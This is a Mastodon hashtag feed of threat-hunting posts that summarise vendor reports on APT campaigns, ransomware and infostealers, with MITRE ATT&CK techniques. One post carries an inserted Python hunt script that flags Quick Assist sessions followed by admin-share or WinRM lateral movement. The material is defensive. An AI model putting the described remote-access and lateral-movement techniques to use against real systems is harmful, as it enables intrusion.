mamot.fr is one of the many independent Mastodon servers you can use to participate in the fediverse.
Mamot.fr is a French-speaking Mastodon server run by La Quadrature du Net.


#threatdetection


Good day everyone!

Check Point Software researchers produced another great article that involves #APT29 and #phishing and a little bit of masquerading. This phishing campaign targeted European diplomatic entities by distributing fake invitations to diplomatic events, and it appears to be a continuation of a previous campaign run by the same actors. These phishing emails utilized a backdoor known as #Wineloader and also employed a new loader, #Grapeloader. There is a lot to unpack here and I hope you enjoy!

Renewed APT29 Phishing Campaign Against European Diplomats
research.checkpoint.com/2025/a

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Check Point Research · Renewed APT29 Phishing Campaign Against European Diplomats
Check Point Research uncovers APT29 targeting European diplomatic entities with phishing attacks spreading the Grapeloader malware.

Happy Wednesday everyone!

Today's #readoftheday starts strong! "Microsoft Threat Intelligence and Microsoft Security Response Center (MSRC) have discovered post-compromise exploitation of a zero-day elevation of privilege vulnerability in the Windows Common Log File System (CLFS) against a small number of targets." and their discovery involved #PipeMagic malware which was used to deploy ransomware. Enjoy and Happy Hunting!

Exploitation of CLFS zero-day leads to ransomware activity
microsoft.com/en-us/security/b

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

Microsoft Security Blog · Exploitation of CLFS zero-day leads to ransomware activity
Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) have discovered post-compromise exploitation of a newly discovered zero-day vulnerability in the Windows Common Log File System (CLFS) against a small number of targets. Microsoft released security updates to address the vulnerability, tracked as CVE-2025-29824, on April 8, 2025.

Good day everyone!

Today's #readoftheday involves Microsoft Office add-ins, masquerading, trojans, and MUCH MORE! Kaspersky researchers share the details about a project on SourceForge that was distributing malware. It appeared to be a project for Microsoft Office add-ins, copied from a legitimate project on GitHub, but in reality it was a list of Microsoft Office applications that led to an archive containing an installer file (.msi). Once that is run, a bunch of bad stuff happens (I'm not going to ruin it for you) and then you are left with a miner and the #ClipBanker malware, which replaces cryptocurrency wallet addresses in the clipboard with the attacker's own, which is pretty interesting as well! I hope you enjoy it as much as I did! Happy Hunting!

Attackers distributing a miner and the ClipBanker Trojan via SourceForge
securelist.com/miner-clipbanke

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

Kaspersky · Attackers distributing a miner and the ClipBanker Trojan via SourceForge, by AMR

Happy Monday everyone!

Just got done reading an incredible article from ESET researchers describing an APT group that was long thought to be inactive but is alive and well! #FamousSparrow is a China-aligned APT group that had no publicly documented activity since 2022 and was found using two previously undocumented versions of its backdoor, SparrowDoor. They used a mix of publicly available and custom tools for their attack, ultimately leading to the deployment of SparrowDoor and ShadowPad (a privately sold backdoor). This report gets more and more interesting as you go, so please go take the time to read it! Enjoy and Happy Hunting!

You will always remember this as the day you finally caught FamousSparrow
welivesecurity.com/en/eset-res

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

welivesecurity.com · You will always remember this as the day you finally caught FamousSparrow
ESET researchers uncover the toolset used by the FamousSparrow APT group, including two undocumented versions of the group's signature backdoor, SparrowDoor.

Happy Wednesday!

I know this is a repeat of yesterday, but tomorrow is the day! You still have time to register and get your community HUNTER account before we begin! I look forward to seeing you there! Happy Hunting!
linkedin.com/events/threathunt

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #workshop #webinar

LinkedIn · Threat Hunting Foundations Workshop: Moving Beyond IOCs to Behaviors & TTPs
This four-hour workshop equips veteran threat hunters, SOC analysts, and cybersecurity professionals with the skills to move beyond traditional indicators of compromise (IOCs) and focus on behaviors and tactics, techniques, and procedures (TTPs). Through a combination of foundational instruction and hands-on exercises, attendees will gain a structured approach to identifying, investigating, and responding to threats.

The workshop begins with a lecture covering key cybersecurity models, including the Pyramid of Pain, Lockheed Martin Cyber Kill Chain, Unified Kill Chain, and MITRE ATT&CK Framework. Participants will explore common threat-hunting tools and methodologies before breaking down the six-phase threat-hunting process, with a focus on practical application. In the hands-on lab, attendees will apply these concepts by operationalizing an intelligence report, forming hypotheses, and conducting a structured hunt. They will execute queries, pivot through data to build context, and identify relationships between events. The session concludes with guidance on documenting and presenting findings effectively.

Key Takeaways:
- Understand core cybersecurity models and their role in threat hunting.
- Learn how to operationalize threat intelligence and develop hypotheses.
- Gain hands-on experience executing and refining hunt queries.
- Identify and analyze adversary behaviors through structured methodologies.
- Improve documentation and reporting techniques for threat-hunting investigations.

This interactive workshop provides both the theoretical foundation and technical skills necessary to improve threat-hunting capabilities and uncover adversary behaviors more effectively. After the workshop, attendees can complete a final challenge to earn the Threat Hunting – Foundational Badge, recognizing their ability to apply core threat-hunting concepts. The challenge reinforces key skills, including hypothesis-driven hunting, executing queries, analyzing adversary behaviors, and documenting findings. Successfully completing it demonstrates proficiency in behavioral analysis and structured threat detection.

Happy Monday everyone!

Coming out of a brief lull in activity, I have a #readoftheday for you! This comes from a CYFIRMA article that takes a look at the APT #VoltTyphoon. They share vulnerabilities that have been recently exploited and (my favorite part) recent #TTPs and #behaviors associated with the group! It is so well documented that I am not even going to recreate it here! I will definitely be diving back into their archives to see if there are more of these profile articles! Enjoy and Happy Hunting!

APT PROFILE – VOLT TYPHOON
cyfirma.com/research/apt-profi

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

CYFIRMA · APT PROFILE - VOLT TYPHOON
Volt Typhoon is a Chinese state-sponsored hacker group that has been targeting critical infrastructure in the United States and other...

Happy Monday everyone!

Today's #readoftheday is brought to you by Trend Micro and they share their findings related to #BlackBasta and #CactusRansomware adding a piece of malware known as #BackConnect to their toolbox.

The report states "The BackConnect malware is a tool that cybercriminals use to establish and maintain persistent control over compromised systems. Once infiltrated, it grants attackers a wide range of remote control capabilities, allowing them to execute commands on the infected machine. This enables them to steal sensitive data, such as login credentials, financial information, and personal files."

Behaviors (MITRE ATT&CK):

Initial Access - TA0001:
Phishing: Spearphishing Voice - T1566.004 - The attackers conducted an email bombing campaign, then contacted the victim posing as "IT Support" or "HelpDesk".

Command and Control - TA0011:
Remote Access Software - T1219 - The attackers used Quick Assist to access the victim's environment once the victim had been successfully social engineered.

Lateral Movement - TA0008:
Remote Services: SMB/Windows Admin Shares - T1021.002
Remote Services: Windows Remote Management - T1021.006
The attackers leveraged SMB shared folders and WinRM for lateral movement.

Go check out the rest of the technical details! Enjoy and Happy Hunting!

Black Basta and Cactus Ransomware Groups Add BackConnect Malware to Their Arsenal
trendmicro.com/en_us/research/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

Trend Micro · Black Basta and Cactus Ransomware Groups Add BackConnect Malware to Their Arsenal
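
The three behaviors listed in the post above translate directly into a hunt. The following is an added example, not code from Trend Micro or from the poster: it runs over constructed telemetry (Sysmon-style process-creation records and Security Event 5140-style network share accesses; the Quick Assist install path is illustrative) and flags accounts that combine a Quick Assist session with admin-share or WinRM lateral movement. wsmprovhost.exe as a parent process is the indicator for commands arriving over WinRM; admin shares match ADMIN$ or a drive-root share such as C$.

```python
"""Hunt logic for the Black Basta / Cactus chain: Quick Assist remote access
(T1219) followed by admin-share (T1021.002) or WinRM (T1021.006) lateral
movement by the same account. Added example; telemetry is constructed."""
import ntpath
import re
from collections import defaultdict

# Constructed events. "process" ~ Sysmon Event ID 1, "share" ~ Security Event ID 5140.
SAMPLE_EVENTS = [
    # Victim launches Quick Assist after the "HelpDesk" call (path illustrative).
    {"ts": 1, "kind": "process", "host": "WS01", "user": r"ACME\jdoe",
     "image": r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe",
     "parent": r"C:\Windows\explorer.exe"},
    # Same account then touches ADMIN$ on a file server and runs a command over WinRM.
    {"ts": 2, "kind": "share", "host": "FS01", "user": r"ACME\jdoe",
     "share": r"\\*\ADMIN$", "src_ip": "10.0.0.15"},
    {"ts": 3, "kind": "process", "host": "FS01", "user": r"ACME\jdoe",
     "image": r"C:\Windows\System32\whoami.exe",
     "parent": r"C:\Windows\System32\wsmprovhost.exe"},
    # Benign admin activity: admin share + WinRM, but no remote-assistance session.
    {"ts": 4, "kind": "share", "host": "FS01", "user": r"ACME\svc-patch",
     "share": r"\\*\C$", "src_ip": "10.0.0.5"},
    {"ts": 5, "kind": "process", "host": "FS01", "user": r"ACME\svc-patch",
     "image": r"C:\Windows\System32\powershell.exe",
     "parent": r"C:\Windows\System32\wsmprovhost.exe"},
    # Ordinary user share access (not an admin share).
    {"ts": 6, "kind": "share", "host": "FS01", "user": r"ACME\asmith",
     "share": r"\\*\Public", "src_ip": "10.0.0.22"},
]

# ADMIN$ or a single-letter drive-root share (C$, D$, ...).
ADMIN_SHARE_RE = re.compile(r"^(admin|[a-z])\$$")


def basename(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()


def remote_assist_sessions(events):
    """(host, user) pairs where QuickAssist.exe was launched (T1219)."""
    return {(e["host"], e["user"]) for e in events
            if e["kind"] == "process" and basename(e["image"]) == "quickassist.exe"}


def admin_share_hits(events):
    """5140-style accesses to ADMIN$ or a drive-root share (T1021.002)."""
    return [e for e in events if e["kind"] == "share"
            and ADMIN_SHARE_RE.match(e["share"].rsplit("\\", 1)[-1].lower())]


def winrm_children(events):
    """Processes spawned by wsmprovhost.exe, the WinRM remote-shell host (T1021.006)."""
    return [e for e in events if e["kind"] == "process"
            and basename(e.get("parent", "")) == "wsmprovhost.exe"]


def correlate(events):
    """Per-account view: suspicious when a Quick Assist session and lateral
    movement are seen for the same account. Lateral movement alone is not
    flagged, which keeps routine admin WinRM use out of the result."""
    by_user = defaultdict(lambda: {"quickassist_hosts": set(),
                                   "admin_share_hosts": set(),
                                   "winrm_hosts": set()})
    for host, user in remote_assist_sessions(events):
        by_user[user]["quickassist_hosts"].add(host)
    for e in admin_share_hits(events):
        by_user[e["user"]]["admin_share_hosts"].add(e["host"])
    for e in winrm_children(events):
        by_user[e["user"]]["winrm_hosts"].add(e["host"])
    for f in by_user.values():
        f["suspicious"] = bool(f["quickassist_hosts"]) and bool(
            f["admin_share_hosts"] or f["winrm_hosts"])
    return dict(by_user)


if __name__ == "__main__":
    for user, f in correlate(SAMPLE_EVENTS).items():
        print(user, "SUSPICIOUS" if f["suspicious"] else "ok", f)
```

In a real environment the Quick Assist indicator would also cover the process name of the Store package and the Event ID 4624 logon type 3 that precedes the share access; the correlation key (account plus a time window) is what separates this chain from everyday administration.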

Happy Friday everyone!

I feel like this has become a weekly PSA, but Kaspersky Securelist researchers have identified hundreds of #GitHub projects that are serving up malicious code designed to steal saved credentials, cryptocurrency wallets, and browsing history. Sometimes this execution of code leads to the #AsyncRAT or #Quasar backdoor, but the threat remains the same: blindly executing code from GitHub. I hope you enjoy and Happy Hunting!

The GitVenom campaign: cryptocurrency theft using GitHub

securelist.com/gitvenom-campai

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Kaspersky · The GitVenom campaign: cryptocurrency theft using GitHub, by Georgy Kucherin

Good day everyone!

An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers, and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used the age-old technique of spear-phishing to gain initial access, with various attachments that contained the legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.

As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!

Angry Likho: Old beasts in a new forest
securelist.com/angry-likho-apt

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Kaspersky · Angry Likho: Old beasts in a new forest, by Kaspersky

Good day everyone!

Forescout Technologies Inc. researchers identified a malware cluster, associated with the Chinese APT #SilverFox, that masqueraded as MediaViewerLauncher.exe, the primary executable for the Philips DICOM viewer. When downloaded, these executables led to the deployment of #ValleyRAT (a Remote Access Trojan), a backdoor, a keylogger, and a crypto miner on victim computers.

Behaviors (MITRE ATT&CK):

Discovery - TA0007:
System Network Configuration Discovery: Internet Connection Discovery - T1016.001 - Living-off-the-land binaries are used to check if the system can reach the C2 server.

Persistence - TA0003:
Scheduled Task/Job: Scheduled Task - T1053.003 - The malware creates a scheduled task that triggers on logon for persistence.

Healthcare Malware Hunt, Part 1: Silver Fox APT Targets Philips DICOM Viewers
lnkd.in/ghQS3nwv

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday #HappyHunting


Happy Monday everyone!

The AhnLab, Inc. Security Intelligence Center (ASEC) has been monitoring infostealer malware disguised as illegal software and keygens and found that most of the malware distributed in this manner has been the #LummaC2 infostealer, BUT there has been an increase in distribution of #ACRStealer as well. What is pretty interesting is the technique they use for C2: in this case they have used Steam, telegra.ph, Google Docs (Forms), and Google Docs (Presentation). Enjoy and Happy Hunting!

ACRStealer Infostealer Exploiting Google Docs as C2
asec.ahnlab.com/en/86390/

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

ASEC · ACRStealer Infostealer Exploiting Google Docs as C2
AhnLab SEcurity intelligence Center (ASEC) monitors the Infostealer malware disguised as illegal programs such as cracks and keygens being distributed, and publishes related trends and changes through the Ahnlab TIP and ASEC Blog posts. While the majority of the malware distributed in this manner has been the LummaC2 Infostealer, the ACRStealer Infostealer has seen an […]